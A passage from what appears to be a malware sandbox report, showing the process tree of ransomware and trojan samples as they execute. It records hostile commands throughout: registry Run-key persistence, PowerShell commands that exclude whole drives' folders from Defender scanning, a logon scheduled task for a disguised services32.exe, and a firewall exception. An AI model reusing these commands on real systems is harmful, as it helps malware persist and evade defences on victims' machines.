                                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                          9⤵
                                                            PID:9012
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                            9⤵
                                                              PID:5700
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                              9⤵
                                                                PID:6084
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                9⤵
                                                                  PID:8172
                                                                  • C:\Windows\System32\Conhost.exe
                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    10⤵
                                                                      PID:7724
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                    9⤵
                                                                      PID:4392
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                      9⤵
                                                                        PID:7868
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                        9⤵
                                                                          PID:8280
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                          9⤵
                                                                            PID:4828
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                            9⤵
                                                                              PID:5560
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                              9⤵
                                                                                PID:3960
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                9⤵
                                                                                  PID:5652
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                  9⤵
                                                                                    PID:2620
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f
                                                                                    9⤵
                                                                                      PID:6176
                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Rack.gen-1a4394286e8197f7656f8ac0fec4dc6c7e6a69914a308560dec46559d6b2a32a.exe
                                                                          HEUR-Trojan-Ransom.Win32.Rack.gen-1a4394286e8197f7656f8ac0fec4dc6c7e6a69914a308560dec46559d6b2a32a.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:4684
                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-1603c15e595d92d74bbd2e6bbc4e5acfe77a2e0faa2e3c03dc7411f1e06ba12e.exe
                                                                          HEUR-Trojan-Ransom.Win32.Stop.gen-1603c15e595d92d74bbd2e6bbc4e5acfe77a2e0faa2e3c03dc7411f1e06ba12e.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:2560
                                                                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-1603c15e595d92d74bbd2e6bbc4e5acfe77a2e0faa2e3c03dc7411f1e06ba12e.exe
                                                                            HEUR-Trojan-Ransom.Win32.Stop.gen-1603c15e595d92d74bbd2e6bbc4e5acfe77a2e0faa2e3c03dc7411f1e06ba12e.exe
                                                                            4⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:616
                                                                            • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-1603c15e595d92d74bbd2e6bbc4e5acfe77a2e0faa2e3c03dc7411f1e06ba12e.exe
                                                                              "C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-1603c15e595d92d74bbd2e6bbc4e5acfe77a2e0faa2e3c03dc7411f1e06ba12e.exe" --Admin IsNotAutoStart IsNotTask
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1700
                                                                              • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-1603c15e595d92d74bbd2e6bbc4e5acfe77a2e0faa2e3c03dc7411f1e06ba12e.exe
                                                                                "C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-1603c15e595d92d74bbd2e6bbc4e5acfe77a2e0faa2e3c03dc7411f1e06ba12e.exe" --Admin IsNotAutoStart IsNotTask
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5236
                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-3bfc8633bcc905f68a361a78aa0d48517bbc57632c2df2375e12057cd63d7687.exe
                                                                          HEUR-Trojan-Ransom.Win32.Stop.gen-3bfc8633bcc905f68a361a78aa0d48517bbc57632c2df2375e12057cd63d7687.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:2608
                                                                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-3bfc8633bcc905f68a361a78aa0d48517bbc57632c2df2375e12057cd63d7687.exe
                                                                            HEUR-Trojan-Ransom.Win32.Stop.gen-3bfc8633bcc905f68a361a78aa0d48517bbc57632c2df2375e12057cd63d7687.exe
                                                                            4⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5744
                                                                            • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-3bfc8633bcc905f68a361a78aa0d48517bbc57632c2df2375e12057cd63d7687.exe
                                                                              "C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-3bfc8633bcc905f68a361a78aa0d48517bbc57632c2df2375e12057cd63d7687.exe" --Admin IsNotAutoStart IsNotTask
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1300
                                                                              • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-3bfc8633bcc905f68a361a78aa0d48517bbc57632c2df2375e12057cd63d7687.exe
                                                                                "C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-3bfc8633bcc905f68a361a78aa0d48517bbc57632c2df2375e12057cd63d7687.exe" --Admin IsNotAutoStart IsNotTask
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:5588
                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-76ee80e6da636e1751c2a9d7c7d4f18e3068babd79d8333961eaee1bca7c50e6.exe
                                                                          HEUR-Trojan-Ransom.Win32.Stop.gen-76ee80e6da636e1751c2a9d7c7d4f18e3068babd79d8333961eaee1bca7c50e6.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:1468
                                                                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-76ee80e6da636e1751c2a9d7c7d4f18e3068babd79d8333961eaee1bca7c50e6.exe
                                                                            HEUR-Trojan-Ransom.Win32.Stop.gen-76ee80e6da636e1751c2a9d7c7d4f18e3068babd79d8333961eaee1bca7c50e6.exe
                                                                            4⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            PID:5900
                                                                            • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-76ee80e6da636e1751c2a9d7c7d4f18e3068babd79d8333961eaee1bca7c50e6.exe
                                                                              "C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-76ee80e6da636e1751c2a9d7c7d4f18e3068babd79d8333961eaee1bca7c50e6.exe" --Admin IsNotAutoStart IsNotTask
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3820
                                                                              • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-76ee80e6da636e1751c2a9d7c7d4f18e3068babd79d8333961eaee1bca7c50e6.exe
                                                                                "C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-76ee80e6da636e1751c2a9d7c7d4f18e3068babd79d8333961eaee1bca7c50e6.exe" --Admin IsNotAutoStart IsNotTask
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5128
                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-806b94827deeb8e69adb9119e604d571af1dc3d4a60025d5faa9a6243f040f4a.exe
                                                                          HEUR-Trojan-Ransom.Win32.Stop.gen-806b94827deeb8e69adb9119e604d571af1dc3d4a60025d5faa9a6243f040f4a.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Checks processor information in registry
                                                                          PID:2104
                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan-Ransom.Win32.Stop.gen-8f438be9087893eb89cc179a9ddde3c868ed1998c4f87ad0abce6c56ae3b1ecc.exe
                                                                          HEUR-Trojan-Ransom.Win32.Stop.gen-8f438be9087893eb89cc179a9ddde3c868ed1998c4f87ad0abce6c56ae3b1ecc.exe
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Drops file in Program Files directory
                                                                          PID:5160
                                                                          • C:\Users\Admin\AppData\Local\Temp\yankee\fuk.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\yankee\fuk.exe"
                                                                            4⤵
                                                                            • Drops startup file
                                                                            • Executes dropped EXE
                                                                            PID:5708
                                                                            • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                              PID:5092
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 988
                                                                              5⤵
                                                                              • Program crash
                                                                              PID:652
                                                                          • C:\Users\Admin\AppData\Local\Temp\yankee\vts.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\yankee\vts.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Adds Run key to start application
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:5652
                                                                            • C:\Windows\SysWOW64\dllhost.exe
                                                                              dllhost.exe
                                                                              5⤵
                                                                                PID:5888
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c cmd < Parve.vss
                                                                                5⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:5796
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd
                                                                                  6⤵
                                                                                    PID:4628
                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                      findstr /V /R "^LMdJCxRSRoddjdlTxyoqClWafTdkkbEWYdXeiJSojeIIDRNHLutVIRNBQXzJtFGzDxaWziMKjZNmBhOnyJAyaIhuCcjpdprGvgtpm$" Puramente.vss
                                                                                      7⤵
                                                                                        PID:6348
                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com
                                                                                        Larghe.exe.com V
                                                                                        7⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:6852
                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com
                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com V
                                                                                          8⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:7772
                                                                                          • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com
                                                                                            C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com V
                                                                                            9⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:7528
                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com
                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com V
                                                                                              10⤵
                                                                                                PID:7964
                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com
                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com V
                                                                                                  11⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:7060
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com
                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com V
                                                                                                    12⤵
                                                                                                      PID:8964
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com
                                                                                                        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Larghe.exe.com V
                                                                                                        13⤵
                                                                                                          PID:1500
                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                              ping GLZCSNLK -n 30
                                                                                              7⤵
                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                              • Runs ping.exe
                                                                                              PID:9176
                                                                                    • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-d0793065451ae93e07e34af2d96929631fb3021595fdb6b68f5407d657918538.exe
                                                                                      HEUR-Trojan.MSIL.Crypt.gen-d0793065451ae93e07e34af2d96929631fb3021595fdb6b68f5407d657918538.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5508
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 1240
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:7664
                                                                                    • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-db210fca52ce8805306f36e12e230da6c754fc43f880c9fcb2f28c1e85e7799a.exe
                                                                                      HEUR-Trojan.MSIL.Crypt.gen-db210fca52ce8805306f36e12e230da6c754fc43f880c9fcb2f28c1e85e7799a.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5976
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 1256
                                                                                        4⤵
                                                                                        • Program crash
                                                                                        PID:8444
                                                                                    • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-de6e8623a7ad333f7fcf4ddef8da9c40a565e8db9f3a0fa9834d3adc9cbf6fcb.exe
                                                                                      HEUR-Trojan.MSIL.Crypt.gen-de6e8623a7ad333f7fcf4ddef8da9c40a565e8db9f3a0fa9834d3adc9cbf6fcb.exe
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:6088
                                                                                      • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-de6e8623a7ad333f7fcf4ddef8da9c40a565e8db9f3a0fa9834d3adc9cbf6fcb.exe
                                                                                        "{path}"
                                                                                        4⤵
                                                                                        • Checks computer location settings
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:744
                                                                                        • C:\Users\Admin\AppData\Roaming\Z-Host.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Z-Host.exe"
                                                                                          5⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:7724
                                                                                          • C:\Users\Admin\AppData\Roaming\Z-Host.exe
                                                                                            "{path}"
                                                                                            6⤵
                                                                                              PID:9028
                                                                                            • C:\Users\Admin\AppData\Roaming\Z-Host.exe
                                                                                              "{path}"
                                                                                              6⤵
                                                                                                PID:5388
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Z-Host.exe" "Z-Host.exe" ENABLE
                                                                                                  7⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:8296
                                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-e03cd00c465dc4212e674ac7e6a3fb99bc51d7f20e2ad5dbfcbc30aaf0e932f8.exe
                                                                                          HEUR-Trojan.MSIL.Crypt.gen-e03cd00c465dc4212e674ac7e6a3fb99bc51d7f20e2ad5dbfcbc30aaf0e932f8.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5004
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 1248
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:6288
                                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-e26a7175df75696be4223bc618067f43bddd747ba4fc5a7abce20256a2c407bb.exe
                                                                                          HEUR-Trojan.MSIL.Crypt.gen-e26a7175df75696be4223bc618067f43bddd747ba4fc5a7abce20256a2c407bb.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:2956
                                                                                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-e26a7175df75696be4223bc618067f43bddd747ba4fc5a7abce20256a2c407bb.exe
                                                                                            "C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-e26a7175df75696be4223bc618067f43bddd747ba4fc5a7abce20256a2c407bb.exe"
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:6352
                                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-e6000c9255fd086dbb888a4b905915318140bfe6dd9dea9798c917b48b5c5c7a.exe
                                                                                          HEUR-Trojan.MSIL.Crypt.gen-e6000c9255fd086dbb888a4b905915318140bfe6dd9dea9798c917b48b5c5c7a.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4492
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1256
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:7832
                                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-edf47f84cdacfeff6f7d3bd802c5659adb64c42110e1f477b41db7590091cda0.exe
                                                                                          HEUR-Trojan.MSIL.Crypt.gen-edf47f84cdacfeff6f7d3bd802c5659adb64c42110e1f477b41db7590091cda0.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5152
                                                                                          • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-edf47f84cdacfeff6f7d3bd802c5659adb64c42110e1f477b41db7590091cda0.exe
                                                                                            "C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-edf47f84cdacfeff6f7d3bd802c5659adb64c42110e1f477b41db7590091cda0.exe"
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:8372
                                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-ef0ae016d5aeaf6ae014ea67a9eddbb712752b473be09345400dbc69cf818afd.exe
                                                                                          HEUR-Trojan.MSIL.Crypt.gen-ef0ae016d5aeaf6ae014ea67a9eddbb712752b473be09345400dbc69cf818afd.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5216
                                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-ef8405b88881c0d5ef6ee3905c1b87671218d8261292944b1da5a3c9e7d198ce.exe
                                                                                          HEUR-Trojan.MSIL.Crypt.gen-ef8405b88881c0d5ef6ee3905c1b87671218d8261292944b1da5a3c9e7d198ce.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:5436
                                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-f514071342a4576d842e3921ee377ee167fff4820e26d0bc05639600e332d440.exe
                                                                                          HEUR-Trojan.MSIL.Crypt.gen-f514071342a4576d842e3921ee377ee167fff4820e26d0bc05639600e332d440.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5424
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 1256
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:6432
                                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-fafc941faeb304dd3650c4a6dd6b04f55d13654e1ff7542411b7e19687315932.exe
                                                                                          HEUR-Trojan.MSIL.Crypt.gen-fafc941faeb304dd3650c4a6dd6b04f55d13654e1ff7542411b7e19687315932.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5824
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 1260
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:8048
                                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Crypt.gen-fb0631a9cb70f0bcf9888a4efa740ba76308231dcc67521128de6777d947ed01.exe
                                                                                          HEUR-Trojan.MSIL.Crypt.gen-fb0631a9cb70f0bcf9888a4efa740ba76308231dcc67521128de6777d947ed01.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4220
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 1260
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:8844
                                                                                        • C:\Users\Admin\Desktop\00461\HEUR-Trojan.MSIL.Cryptos.gen-660018c210f5aef9b7d54dfbaa4848149b98e99a46f539c034604fb6ef278620.exe
                                                                                          HEUR-Trojan.MSIL.Cryptos.gen-660018c210f5aef9b7d54dfbaa4848149b98e99a46f539c034604fb6ef278620.exe
                                                                                          3⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies registry class
                                                                                          PID:1504
                                                                                          • C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
                                                                                            4⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            PID:2960
                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                              "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                              5⤵
                                                                                                PID:5464
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5132
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:8768
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:8716
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                  6⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:7148
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
                                                                                                5⤵
                                                                                                  PID:8824
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
                                                                                                    6⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Drops file in System32 directory
                                                                                                    PID:6736
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                      7⤵
                                                                                                        PID:7428
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                          8⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:8340
                                                                                                      • C:\Windows\system32\services32.exe
                                                                                                        "C:\Windows\system32\services32.exe"
                                                                                                        7⤵
                                                                                                        • Checks computer location settings
                                                                                                        PID:8080
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                          8⤵
                                                                                                            PID:8232
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                              9⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:6988
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                              9⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:4672
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
